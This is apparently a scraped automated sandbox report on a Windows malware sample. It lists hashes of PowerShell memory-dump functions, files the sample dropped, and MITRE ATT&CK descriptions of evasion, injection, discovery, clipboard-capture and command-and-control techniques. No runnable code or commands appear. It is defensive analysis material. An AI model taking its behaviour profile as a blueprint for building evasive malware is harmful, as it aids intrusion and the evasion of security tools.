Opcode ID: 3f4af4fee41b2cccedac84b01d21e999a2fbe3bc52d478fc3e35c9d20b3b81bb
Instruction ID: 237c950b9f340a0a006986c8a3b0b72124c92e17f56c03f2c5292b4452632812
Opcode Fuzzy Hash: 3f4af4fee41b2cccedac84b01d21e999a2fbe3bc52d478fc3e35c9d20b3b81bb
Instruction Fuzzy Hash: 7F412B75A01105DFCB05CF9CC994AAEBBB1FF88310B248258E915EB3A6C735EC51CB54

Function 09710E87 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4a458cb210653e47e64c172501e03c1c02ae7ec6a6f310c4eef0f32d44a05c
Instruction ID: 9133dc0b7605c5a909681f0dcadf013050f57e8f5dda4c8e40ad59b054c504f8
Opcode Fuzzy Hash: 3e4a458cb210653e47e64c172501e03c1c02ae7ec6a6f310c4eef0f32d44a05c
Instruction Fuzzy Hash: 3851CC75A00209DFDB05DFA8D884A9DFBB2FF88314F248559E405AB365CB75ED82CB50

Function 09711E57 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04844a7f93baf2a13d9c466ded7b1b089b02854c418a1a8fe37fc9cf0dc361e5
Instruction ID: 215d0452186594d756d9852ffb7c5b185f303793a6bf64cb53f4116bb7ae305b
Opcode Fuzzy Hash: 04844a7f93baf2a13d9c466ded7b1b089b02854c418a1a8fe37fc9cf0dc361e5
Instruction Fuzzy Hash: CB413B35A011099FCB05CF9CC984AAEBBF1FF88314B648259E915EB365C731AC51CB90

Function 04E72BB0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b69830015af25a3d0134fd802d233b8c1feccdf666c791dbcd6d06b01ca9ba
Instruction ID: 46d0e8aaedc528b6c32ae83bff3e18eb5c0de68ca3a816967c671acb64f93474
Opcode Fuzzy Hash: 37b69830015af25a3d0134fd802d233b8c1feccdf666c791dbcd6d06b01ca9ba
Instruction Fuzzy Hash: FC416A74A00209DFCB19CF59C594AAEFBB1FF48324B158599DA05AB361C732FC51CBA0

Function 07816918 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cd95aa0fb06fb0f7ceb443b094e68e8e82f23a67d4d851c4f19f3b2a526f9e
Instruction ID: fde798c646b7caa41691dbf09073b9e28fa1e89342f1cfeeed09ec7b0c445a72
Opcode Fuzzy Hash: f9cd95aa0fb06fb0f7ceb443b094e68e8e82f23a67d4d851c4f19f3b2a526f9e
Instruction Fuzzy Hash: 353182B4B00214EBE7049BA4C854FAF7A67DFC4B54F108029EA01AF792CF769C458B92

Function 078185DC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8731bc0bf179f5985a39ff72ae938feb8ad20cb7a8132aad5f818f4b1314dd6e
Instruction ID: 01d3c84a8f2c26892d8ef3f2e34e6d50c0015d9c4fad474cbfe52248327ee53b
Opcode Fuzzy Hash: 8731bc0bf179f5985a39ff72ae938feb8ad20cb7a8132aad5f818f4b1314dd6e
Instruction Fuzzy Hash: CF3167F6304202CBCB104F7484162FABBAA8FE2265F04847BD502CB681DF75D985CB93

Function 09710B7C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08fe00e6ba026e3095fb1f9a83a361de0b3b1ae8c8c773262e0348bd3e94505
Instruction ID: 676fb146114c0619561f725b518a87c9f670e6e914a7b5f4a305711f6741dddf
Opcode Fuzzy Hash: d08fe00e6ba026e3095fb1f9a83a361de0b3b1ae8c8c773262e0348bd3e94505
Instruction Fuzzy Hash: 7F310A75A00509DFCB14CF9DC994AAEFBB1FF48310B248299D919AB751C732EC91CB90

Function 07813DEB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b992113d8ad5cd0af5c1b0271d1152726d02c59ac389711e485248aba51cdb6
Instruction ID: edd024778b07090985079767ad4eb07a59bfbe05b882c2f6021f0ea874aa6a6b
Opcode Fuzzy Hash: 9b992113d8ad5cd0af5c1b0271d1152726d02c59ac389711e485248aba51cdb6
Instruction Fuzzy Hash: 3921F6F6D00319DBCF249E59C9802AABBB8FF99210B5981A6CC08E7A04E731E955C7D1

Function 04E7F510 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a3990d3e8387f37a8f94a5776cc7dbc253f1c8b1a39d6ed86f18beddeaa7b86
Instruction ID: 275464c4df2273dfaa94b145cd82372a065e7f2c11ed00839c75602649bd8434
Opcode Fuzzy Hash: 7a3990d3e8387f37a8f94a5776cc7dbc253f1c8b1a39d6ed86f18beddeaa7b86
Instruction Fuzzy Hash: 0011E9357182408FC70AAB7CD45856D7BA2EFC9721714045ED546C7BA2CE349C07CF62

Function 04E7A950 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 656d302ed90781e782135b1b4f4bab7803946b5fcbb1924e53131a01fea02d23
Instruction ID: fd755bd642993e689c37c171b082257fe994aa609f4bca9b57471cd092b80257
Opcode Fuzzy Hash: 656d302ed90781e782135b1b4f4bab7803946b5fcbb1924e53131a01fea02d23
Instruction Fuzzy Hash: 50218EB4A05249CFCB02CFA8D8909AEBFB0FF8A310B15419AD845DB352D335EC41CBA1

Function 0971076C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c528d81e12d1aab25377f1387cfec4fbed9b6e1f4f7873776a2ee0325c771a11
Instruction ID: 982a03200c5133a91782ce819f954baa900949fc72327f09ae7cd60ca2b43591
Opcode Fuzzy Hash: c528d81e12d1aab25377f1387cfec4fbed9b6e1f4f7873776a2ee0325c771a11
Instruction Fuzzy Hash: D221BE3090E3C68FC7079B7898551C97FB4EF47254B4901EBC081CF1A3E7A8584ACBA1

Function 0498F51B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2815773747.000000000498D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0498D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_498d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
Instruction ID: b2a7ea5ceaaa9be6e1ccfbbdb51b3103d722a44c384d7afa9e5da303f1e66ac2
Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
Instruction Fuzzy Hash: 06218E76504240DFCF06DF14D5C4B15BF61FB48314F24C6ADD9094A66AC33AD456CB91

Function 04E7FF20 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d119ce478ef1ff46804549b1840ad50c5a4016d7f2c4c95e0588a995a8ee48ce
Instruction ID: 1ae622e3ecfcc12f9d7ad7f469ec8c074637abd9d752a967078c24e6fd679f31
Opcode Fuzzy Hash: d119ce478ef1ff46804549b1840ad50c5a4016d7f2c4c95e0588a995a8ee48ce
Instruction Fuzzy Hash: A11167729003498FDB20DFAAC8457EFBBF4AF88320F24841AD515A7200CB75A540CBA1

Function 04E7FF28 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d4d0e949811d3b9667dd984c75ed2f047fd2eb9e723618dd861622c4829e7f
Instruction ID: d6abfa0dce1fc36099d70cd40e2e78737b763d6dd02d7fbfaee907537e07955f
Opcode Fuzzy Hash: 10d4d0e949811d3b9667dd984c75ed2f047fd2eb9e723618dd861622c4829e7f
Instruction Fuzzy Hash: 601158719003498FDB10DFAAC4457EFFFF4AF88324F248419D519A7240CB75A544CBA5

Function 09710F94 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2831949700.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885f81e891c22440a57ce2ff379ec3b39e0e2ceae349c507b9663164bb19ebf6
Instruction ID: e7e1cf6cebd7965fc0ea16e383760927be1ff729ca69f35e9cc3df6c5a0c52ce
Opcode Fuzzy Hash: 885f81e891c22440a57ce2ff379ec3b39e0e2ceae349c507b9663164bb19ebf6
Instruction Fuzzy Hash: 3D11B935A00209EFDB05CF98D885E9DBBB6FF88314F288559F405AB361C775A982CB50

Function 07812192 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea1ee1e6adf5cfcd2b0291bde81e1d8fe3cf9006cb6f408d6faf197e0aeecde
Instruction ID: f2c8f693496f523c544170b822f5dd921635b946169c925d4a93ed2c6bf11ced
Opcode Fuzzy Hash: 3ea1ee1e6adf5cfcd2b0291bde81e1d8fe3cf9006cb6f408d6faf197e0aeecde
Instruction Fuzzy Hash: C501DDF2F0015497C61146386C02695BB89BBD66A4B0500FECE00EB307D671AC1283C6

Function 0498D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2815773747.000000000498D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0498D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_498d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd29beb9aed17974c751bfa1796acd11bfe998e8d073c956e97341248843edd
Instruction ID: 82791feac8c768b191a46738a2a51a6f84d52758e513504c231275c7b7d760c9
Opcode Fuzzy Hash: 1bd29beb9aed17974c751bfa1796acd11bfe998e8d073c956e97341248843edd
Instruction Fuzzy Hash: 7E012B71505344DAE7106E29EDC4B67BF9CDF41324F08C62EDD084F2C2C6B9A541CAB1

Function 04E7F520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4282131029f93d69bf73ecc1297f27f797964d3cf8efac66f6b684557cc645f5
Instruction ID: caa3bc787cb82ba19b68e0ee505105829b0d8bd204ca5adceab5164b06039467
Opcode Fuzzy Hash: 4282131029f93d69bf73ecc1297f27f797964d3cf8efac66f6b684557cc645f5
Instruction Fuzzy Hash: F7F067353105108B86096B2CE11846E7BA7EFC8B32310401EE906C3B96CE79AC038BA2

Function 0498D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2815773747.000000000498D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0498D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_498d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6de8ff03ff3ecf54c42b286b4b65e24e6a37df2cff7cfc22ad493a7dd832c0c
Instruction ID: ad51ef20d99f6bc8c050931954fc77d877e53ed935e4d04ef3c7b4917a7d1046
Opcode Fuzzy Hash: f6de8ff03ff3ecf54c42b286b4b65e24e6a37df2cff7cfc22ad493a7dd832c0c
Instruction Fuzzy Hash: 89F0C272405344AEE7108E1ADDC4B63FF9CEB41634F18C25AED484E282C279A841CAB1

Function 04E7FDCA Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed864a6d0cbb5b6f2a90b6cded1a50e4a75e5c55dd912e33d8c9cc3ad72814a2
Instruction ID: f78e2b908ffbb33428abeeb3b6e5c2212b3014c66c9144b0f8b1d7a95936e23f
Opcode Fuzzy Hash: ed864a6d0cbb5b6f2a90b6cded1a50e4a75e5c55dd912e33d8c9cc3ad72814a2
Instruction Fuzzy Hash: 83E04F74D002099F8780DFBD85415AAFFF8AB59210F20C4AEC918D7201E731D6429BD1

Function 04E7FDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2816096656.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 465c569264aacf7adc23df46d8108f57bd94fac76d2daf7a7bb13967f7bb8cc1
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: E1D06270D042099FC780DFADC94156DFBF4EB59210F5085AED919D7301F73156128BD1

Non-executed Functions

Function 0781D768 Relevance: 5.5, Strings: 4, Instructions: 484COMMON

Download Yara Rule

Strings

8!o, xrefs: 0781DC37
8!o, xrefs: 0781DC45
8!o, xrefs: 0781D8F4
8!o, xrefs: 0781D902

Memory Dump Source

Source File: 00000002.00000002.2823184439.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 8!o$8!o$8!o$8!o
API String ID: 0-4138260270
Opcode ID: fc721be27911a55f8a432ebe1525ccfad45a3ddc9c0f599d1abdc47d51dc13c8
Instruction ID: fc4e0fb071ab9e989319fde71b27561202e2cdf9e083928fae1c6dccacf27078
Opcode Fuzzy Hash: fc721be27911a55f8a432ebe1525ccfad45a3ddc9c0f599d1abdc47d51dc13c8
Instruction Fuzzy Hash: 73F145B170424ADFDB15CF68C814BAABBAAFFD1324F14846AE515CB291CB71C841CBB1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ro7eoySJ9q.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_215w40j5.33u.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2i3wxqw4.jxt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bacnwdcu.j1f.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hw4yg1yn.olq.psm1

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Detergenternes.bre

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Smkkers.Noe

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\brugerinstallation.cry

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\cloner.hol

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\hickishness.non

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\hogni.opd

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\solvejg.non

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
ro7eoySJ9q.exe

Function 004031DD Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 00405139 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405D68 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Function 004055D5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 0040371A Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Function 00403ABD Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00402CFF Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00402F38 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175
fileCOMMON

Function 00404FFA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

